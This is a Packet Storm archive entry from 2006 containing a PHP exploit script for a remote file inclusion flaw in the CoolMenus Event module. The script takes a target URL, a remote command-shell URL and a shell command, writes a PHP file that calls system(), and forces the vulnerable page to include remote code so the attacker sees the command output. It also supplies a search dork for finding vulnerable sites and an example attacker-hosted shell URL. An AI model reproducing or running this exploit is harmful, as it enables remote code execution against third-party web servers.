coolmenus.txt

2006-05-02T00:00:00
ID PACKETSTORM:45994
Type packetstorm
Reporter AminRayden
Modified 2006-05-02T00:00:00

Description

                                        
                                            `<?php  
/*  
CoolMenus Event Remote File Inclusion exploit Cod3d by R@1D3N  
credit:Kurdish Security  
Gr33t:Oulaw - A.u.r.a - drTp - Cl0wn - b3hzad - Str0ke and all Persian Cyb3r Team  
Site:http://www.Aria-security.net  
Dork:"/event/index.php?page="  
  
example:  
target:http://www.site.com/event/index.php?page=  
cmdshell:http://www.own3r.com/cmd.txt?  
  
*/  
  
$cmd = $_POST["cmd"];  
$target = $_POST["target"];  
$cmdshell = $_POST["cmdshell"];  
  
$form= "<form method=\"post\" action=\"".$PHP_SELF."\">"  
."target:<br><input type=\"text\" name=\"target\" size=\"90\"   
value=\"".$target."\"><br>"  
."cmdshell:<br><input type=\"text\" name=\"cmdshell\" size=\"90\"   
value=\"".$cmdshell."\"><br>"  
."cmd:<br><input type=\"text\" name=\"cmd\" size=\"90\"   
value=\"".$cmd."\"><br>"  
."<input type=\"submit\" value=\"Submit\" name=\"submit\">"  
  
."</form><HR WIDTH=\"650\" ALIGN=\"LEFT\">";  
  
if (!isset($_POST['submit']))  
{  
  
echo $form;  
  
}else{  
  
$file = fopen ("test.txt", "w+");  
  
fwrite($file, "<?php system(\"echo ++BEGIN++\"); system(\"".$cmd."\");  
system(\"echo ++END++\"); ?>");  
fclose($file);  
  
$file = fopen ($target.$cmdshell, "r");  
if (!$file) {  
echo "<p>Unable to get output.\n";  
exit;  
}  
  
echo $form;  
  
while (!feof ($file)) {  
$line .= fgets ($file, 1024)."<br>";  
}  
$tpos1 = strpos($line, "++BEGIN++");  
$tpos2 = strpos($line, "++END++");  
$tpos1 = $tpos1+strlen("++BEGIN++");  
$tpos2 = $tpos2-$tpos1;  
$output = substr($line, $tpos1, $tpos2);  
echo $output;  
  
}  
?>  
`